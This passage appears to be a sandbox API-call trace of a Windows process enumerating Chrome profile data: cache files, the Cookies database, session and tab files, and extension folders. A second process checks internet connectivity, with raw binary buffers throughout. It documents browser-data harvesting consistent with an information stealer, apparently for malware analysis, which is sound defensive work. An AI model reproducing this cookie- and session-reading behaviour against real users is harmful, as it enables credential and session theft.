\xa3\x93\x0bR<\x08;e\x8b\x84\xe2\x17\x08)\x9bB\x16\xc8f\xb3\xc6\x9b\x9f\xaa\xed\xe0\x86eS\x02\xfe\xee\xf7)3\xd2\xa8@\xb2\xfb\x9e{s\xcebM\xef\xcf<}.\xfcy\xe3\xc1\x83\x17\xc7G
\xafq\xb3\xd6\x80\x7f\x9b\x8b\xe18N\x17\xfex\xb6\xe946\x7f\xf3'K\x7f~\xddh\xb7D\xe3Q\xab\xfd\xa4\xf1?\x8d\xb6\xf3\xf8\xa7\xc6\x87w\x9b\x82\xb3_\xc4\xf3t8\x9d`\xe6\xf6Ov\xdbn\xab\x84`9\x1cE\x18\xfd\xab\x8a\x89'~0\x8a1n1_\xc622\x99\xfb\xd0\x1e\xc4%\xfe(U\x91i\x9cb\xa5\xf3x6\xf2\xaf\x8b\xf9\xfd\xe5bZ\x8c\x89'\xe14\x8aK\xb5\x0eGT\xe9\xe6`\xb1\x989\xdb\xdb\x97\x97\x97\xc3\xb1\xdf\x8fS\xdb\x8f\xa6Al\x87\xd31\xc6i\xa1\xaf\xe9v2\x9d\xc7i\x1co\xcb\xfeno7&q\x1c\xa5\x8d\xc5\xb4\x11\xc4\x8d4^4.\x07\xf1\xa4 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,218 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:09,218 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00009e DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,228 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xed\xbdk{\x1b7\x92(\xfc\x99z\x9e\xfc\x07\xb8\x937$-\x8a\x14\xe5\xbb\x18\xc6+_\x92x\xd7\x8e\xbd\x96\x93\xc9\x1eY\xeb\xb7I6\xa5\xb6(6\xd3\xdd\x94\xad\x91y~\xfb\xa9*\xdc\xd1\xe8&)\xc9\xf6d\x9eh&4\x89K\xa1P(\x14
\x85B\xa1s\xf3\xe6\x06\xbb\xc9\xbe\xfb%
GQ\xba\xcb:Y2O\x87Qg\x94\x0c\xd3$\xc9\xe1\xdf\x0f\xd3I\x12\x8e\x86\xd14\x8f\xd2\xce\xfb\xac3\x89\xcf\xa2\xce,\x99\x84\xe9
\xd3\xf6\xfb\xacu\xc6\xba\xed\x9d.\xdb\xd9\xee\xeet\xb6\xbb\x9d\xed;\xac\xfb`\xf7\xd6\xbd\xdd[\xb7\xd8p\x12
\x8f\xa7Q\xca\x9e~\x9c\xb1\xef\xa0\xa5\x0e\xdb\x88\xc7\x8d\xfc|\x16%c\xf6\x9f\xfb/\x7f\xbd\xd1\xef\xd7\x93\xc1\xfbh\x98\xd7\x9b\x17\x98\xd0\xbfX,\x1a\xe3\xf9t\x98\xc7\xc9\xb4\xd1\xbc\xa8\xcf\xb3\x88ey\x1aC\x89\x9eLg\xe3\xc6\xb4y\x91F\xf9<\x9d\xb2\xe9\x0f\xdd\xed\x87\xf5\xed\xfa\xe6 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,278 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:09,278 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00009f DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,298 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00\xc4\xbd\xf9~\xe3F\x96.\xf8\x7f?\x85\x88\xca\xab\x04\x92!J\xf2\xd2\xb7\x0b\x14\x927\x9d\xb6\xcb\xae\xf6\xd6\x95Y\xe5\xaa\xa6h\xff\xb0\x11\x04w\x91T*\xd3"\xfbY\xe6Y\xe6\xc9\xe6|\xe7D\x04\x02 (g\xf5\x9d;\xe3\xaa\x14\xb1\x04b=q\xb68\xcb\xe5\x8b\xce\xd9\xf4?\xee\xf3\xcd\x87\xb3w\xd7\xbd\xff\xd9\xbb>\x9b\xde\xe1\xae\x97\xae\x16g{s\xb3\xda\x14\x97\xf32\xcd\x97\xdb\xfc\xec\xc5\xe5\xbf\xf8\xe3\xfbe\xba+WK?VI\xf0h\xee\xce\xd2\x0f~\x1c<n\xf2\xdd\xfdfy6\xee\x95\xdb\x9f\xcbe\xb6z\xa0\x87\x838\x8c{\xcbU\x96\xbf\xfd\xb0\xce\xa3(\xfa\xe3 \xeee\xf98\xbe\x9f\xef\xfeV\xe6\x0f\xfb}\xdc[\xc7\x9b|\xb9\x93/\xc2\xce\xf5\xa1\xaa\xf5\x1dj-\xc7~'\x9d
\xe3Q\xf0\xf8.\xde\x9c%Q\xdaKV\xd9\x07\x95Ec\xdf\xbb\xf1\xbaq\xd7{\xe9\x05\xbdx\xbd\xce\x97\xd9\xdb\x95\x9f\x04*\x8f\xb2 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,358 | 504 | NtReadFile |
Buffer => \xb5N\x88@O\xe6\xd1\xd6^\x98\x8a6\x92\x86\x10\x83@\xa8d\xd0/\xd8\xe6kT\xeeG8\x00\xc0%LG\x054\xb4r\xf9\xb0^\xe5\xad\xbc\xb1\xb0\xac\xd6\x9c?
\x1c\xe6\x91\x91,\xd3\xf1(\x93T\xcd\x90B\x01\xea\xe49\x8d\xbb9\xcc\xf2\x0e47\xea/B\x06\x97.\x7fFiqE\xff\xed\xbet\x8d\xc9]\x15\x9d:u\xca\x9e(a\x96r\xbc\xe1\xe6\xec\x08\xa3\xb8PYZ\xc4N\xfa{\x08\xdb:P
X\xd1\x1a\xf4\xe7\xc6\x9e\xef\xd7}\xa8K;\xf0E\xcb_\x9bG?`,x\x9a\x0c\xcf{\xc2\xdb\xd0v\xa6SM\xa4\xd3\x8e]UZ\x03\xbf\xa0\xe9g\x18i\x0fni\xaa\xde\xac\xdbM\xed\xb1\xda\xc6
\x84(\xd5\x1dm!\xce\x00\xcd\xa8\xecb\x9aL\xd9kw\xb6Z\xee\xb7v\xc7\x82\xca\\xb4\x1c\xe4\xd8\x8b\xe0\xf3\x17#\xa2\xa2/\xad\xe0U\xdc\xbd\xc8\x89\x0e$\xf1\xc7i \x1b\xdc\xa9\xea\xee\x95\x17\x88\xa0\x85\x11\xe4\xa0:\xde\x1al\xee\xf4m24 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,358 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:09,358 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_0000a0 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,368 | 504 | NtReadFile |
Buffer => var OX=OX||function(f,i){var c={},b,j,h,l,a={},n,k,e="OX_sd";var m=function(){var o=0;return function(){if(o){return}g();o=1}}();function g(){var p,o;if(!k.isFramed()){p=k.getCookie(e);if(parseInt(p)){p++}else{p=1}o=new Date(k.now()+1200000).toGMTString(); FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,428 | 504 | NtReadFile |
Buffer => (c!=null){b.p=c.id;b.w=c.offsetWidth;b.h=c.offsetHeight}top2.realvu.ads[this.len++]=b;b.ru=top2.location.hostname;b.z1=Math.random()<0.01;return b},check:function(h,c){var d=null,b=this;for(var i=0;i<b.len;i++){if(b.ads[i].div==h){d=b.ads[i];break}}if(d==n FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:09,428 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:09,428 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:09,428 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:09,488 | 504 | NtReadFile |
Buffer => SQLite format 3\x00\x04\x00\x01\x01\x00@ \x00\x00\x00*\x00\x00\x00 \x00\x00\x00\x1b\x00\x00\x00\x0c\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00*\x00-\xe2\x1e
\x03\xfc\x00\x05\x01@\x00\x03k\x03\xd3\x01\x83\x03<\x01@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:09,538 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:09,538 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:09,538 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x001727f8 | |
| 07:44:09,538 | 1308 | OpenServiceW |
ServiceControlManager => 0x001727f8 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00182d20 | |
| 07:44:09,538 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:09,538 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:09,538 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:10,009 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:10,019 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cookies-journal DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:10,039 | 504 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:10,129 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:10,139 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Current Session DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:10,159 | 504 | NtReadFile |
Buffer => SNSS\x01\x00\x00\x00 \x00 \x01\x00\x00\x00\x00\x00\x00\x00
\x00\x0f\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 \x00\x02\x02\x00\x00\x00\x00\x00\x00\x00 \x00\x0c\x02\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x01\x00\x00\x00\x02\x00\x00\x001\x00\x13,\x00\x00\x00\x02\x00\x00\x00$\x00\x00\x0002E46F48_F488_4F23_8F17_7AB1678A5F42 \x00\x08\x01\x00\x00\x00\x00\x00\x00\x00\x05\x00\x14\x01\x00\x00\x00\x19\x00\x0e\x01\x00\x00\x00
\x00\x00\x00
\x00\x00\x00\x0c\x03\x00\x00&\x02\x00\x00\x01\x00\x00\x00\x19\x00\x0e\x01\x00\x00\x00
\x00\x00\x00
\x00\x00\x00\x0c\x03\x00\x00&\x02\x00\x00\x01\x00\x00\x00 \x00\x07\x02\x00\x00\x00\x00\x00\x00\x00\xf1\x01\x06\xec\x01\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00U\x00\x00\x00http://get.adobe.com/reader/completi FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:10,249 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:10,259 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Current Tabs DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:10,269 | 504 | NtReadFile |
Buffer => SNSS\x01\x00\x00\x00\x11\x00\x04\x01\x00\x00\x00\x00\x00\x00\x00t\x93\xa9\xc3c[.\x00\xc9\x03\x01\xc4\x03\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00U\x00\x00\x00http://get.adobe.com/reader/completion/aih/?exitcode=1602&re=0&type=install&appid=224\x00\x00\x00\x1d\x00\x00\x00A\x00d\x00o\x00b\x00e\x00 \x00-\x00 \x00D\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00 \x00A\x00d\x00o\x00b\x00e\x00 \x00R\x00e\x00a\x00d\x00e\x00r\x00\x00\x00\x9c\x02\x00\x00\x98\x02\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\xaa\x00\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00g\x00e\x00t\x00.\x00a\x00d\x00o\x00b\x00e\x00.\x00c\x00o\x00 FileHandle => 0x000001bc |
SUCCESS | 0x00000000 | |
| 07:44:10,289 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001bc |
FAILURE | 3221225489 | |
| 07:44:10,289 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:10,339 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:10,339 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:10,339 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:10,339 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:10,339 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:10,369 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension State\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:10,369 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xd02\xfe]\xe0\x91\xcf\x01\x80\xbdE\xd0\xe4\x91\xcf\x01\x80\xbdE\xd0\xe4\x91\xcf\x01\x80\xbdE\xd0\xe4\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00x\x00\x00\x00\x00\x00\x00\x00\xc0G\xf6\xcf\xe4\x91\xcf\x01\xc0G\xf6\xcf\xe4\x91\xcf\x01\xc0G\xf6\xcf\xe4\x91\xcf\x01\xc0G\xf6\xcf\xe4\x91\xcf\x01\x06\x01\x00\x00\x00\x00\x00\x00\x08\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x000\x000\x000\x000\x005\x00.\x00l\x00d\x00b\x006\x007\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x80\xd7\x14\xd0\xe4\x91\xcf\x01p\xa7\x8c\xd3\xe4\x91\xcf\x01p\xa7\x8c\xd3\xe4\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:10,369 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension State\LOG DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:10,369 | 504 | NtReadFile |
Buffer => 2014/06/26-20:50:14.429 3456 Recovering log #3
2014/06/26-20:50:14.471 3456 Level-0 table #5: started
2014/06/26-20:50:14.663 3456 Level-0 table #5: 262 bytes OK
2014/06/26-20:50:14.983 3456 Delete type=0 #3
2014/06/26-20:50:14.987 3456 Delete type=3 # FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:10,369 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:10,369 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension State\MANIFEST-000004 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:10,369 | 504 | NtReadFile |
Buffer => V\xf9\xb8\xf8\x1c\x00\x01\x01\x1aleveldb.BytewiseComparator\xfc\xf2\xa5sm\x00\x01\x02\x06 \x00\x03\x07\x04\x01\x07\x00\x05\x86\x02/pafkbggdmjlpgkdkcbjmhmfcdpncadgh.alarms\x01\x01\x00\x00\x00\x00\x00\x00/pafkbggdmjlpgkdkcbjmhmfcdpncadgh.alarms\x01\x01\x00\x00\x00\x00\x00\x00 FileHandle => 0x000001c8 |
SUCCESS | 0x00000000 | |
| 07:44:10,369 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c8 |
FAILURE | 3221225489 | |
| 07:44:10,369 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => |
FAILURE | 2147483654 | |
| 07:44:10,369 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:10,459 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\*.* |
SUCCESS | 0x0016bdd8 | |
| 07:44:10,459 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => h\x00\x00\x00\x00\x00\x00\x00py-`\xe0\x91\xcf\x01\x90\xaf\x85y\xe0\x91\xcf\x01`(\x84y\xe0\x91\xcf\x01`(\x84y\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x000\x000\x000\x00\xa0\x00\x00\x00\x00\x00\x00\x00py-`\xe0\x91\xcf\x01\xf0\xe6Jx\xe0\x91\xcf\x01\x90\xd8Gx\xe0\x91\xcf\x01\x90\xd8Gx\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x10\x00A\x00O\x00H\x00G\x00H\x00M\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00o\x00h\x00g\x00h\x00m\x00i\x00g\x00h\x00l\x00i\x00e\x00i\x00a\x00i\x00n\x00n\x00e\x00g\x00k\x00c\x00i\x00j\x00n\x00f\x00i\x00l\x00o\x00k\x00 |
SUCCESS | 0x00000000 | |
| 07:44:10,459 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:10,540 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\*.* |
SUCCESS | 0x0016be10 | |
| 07:44:10,540 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00py-`\xe0\x91\xcf\x01\xf0\xe6Jx\xe0\x91\xcf\x01\x90\xd8Gx\xe0\x91\xcf\x01\x90\xd8Gx\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00bjmhmf\x00\x00\x00\x00\x00\x00\x00\x000\x1a\x84j\xe0\x91\xcf\x01\xf0\x02\xecj\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xf0\x02\xecj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00.\x007\x00_\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:44:10,540 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:10,630 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\*.* |
SUCCESS | 0x0016be48 | |
| 07:44:10,630 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001c0 FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x1a\x84j\xe0\x91\xcf\x01\xf0\x02\xecj\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xf0\x02\xecj\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 e = 0x\x00\x00\x00\x00\x00\x00\x00P+\xbej\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01\xc1\x0b\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\x00c\x00o\x00n\x00_\x001\x002\x008\x00.\x00p\x00n\x00g\x00tcx\x00\x00\x00\x00\x00\x00\x00P+\xbej\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 \x17\xd5j\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:10,650 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\main.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:10,650 | 504 | NtReadFile |
Buffer => <!DOCTYPE html>
<html>
<head>
<script src="main.js"></script>
</head>
<body>
</body>
</html> FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:10,650 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a4 |
FAILURE | 3221225489 | |
| 07:44:10,650 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x00010000 BaseAddress => 0x00185000 |
SUCCESS | 0x00000000 | |
| 07:44:10,660 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:10,870 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\*.* |
SUCCESS | 0x0016be80 | |
| 07:44:10,870 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a4 FileInformation => h\x00\x00\x00\x00\x00\x00\x00`\xa1\x85j\xe0\x91\xcf\x01P+\xbej\xe0\x91\xcf\x01P+\xbej\xe0\x91\xcf\x01P+\xbej\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ty_Scah\x00\x00\x00\x00\x00\x00\x00`\xa1\x85j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01`\xa1\x85j\xe0\x91\xcf\x01`\xa1\x85j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00a\x00r\x00\x00\x00\x00\x00\x00\x00h\x00\x00\x00\x00\x00\x00\x00\x90(\x87j\xe0\x91\xcf\x01\xd0d\xcaj\xe0\x91\xcf\x01\x90(\x87j\xe0\x91\xcf\x01\x90(\x87j\xe0\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:44:10,880 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:10,960 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\_locales\ar\*.* |
SUCCESS | 0x001734c0 | |
